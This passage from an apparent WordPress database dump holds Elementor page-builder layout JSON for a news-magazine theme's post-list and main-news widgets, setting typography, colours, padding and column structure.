_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"feegelf\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"51.918\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"328\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"xn60yo4\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"9z1mjq9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"5\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true},{\"id\":\"7lys9fz\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4b0mlug\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"34.995\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"nk9gr2t\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"section_sticky_element\":\"\",\"sticky_element\":\"sticky-yes\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"lpp590q\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1130,414,'_elementor_version','0.4'),(1131,414,'_elementor_css','a:3:{s:4:\"time\";i:1508854563;s:5:\"fonts\";a:0:{}s:6:\"status\";s:4:\"file\";}'),(1133,415,'_elementor_edit_mode','builder'),(1134,415,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"5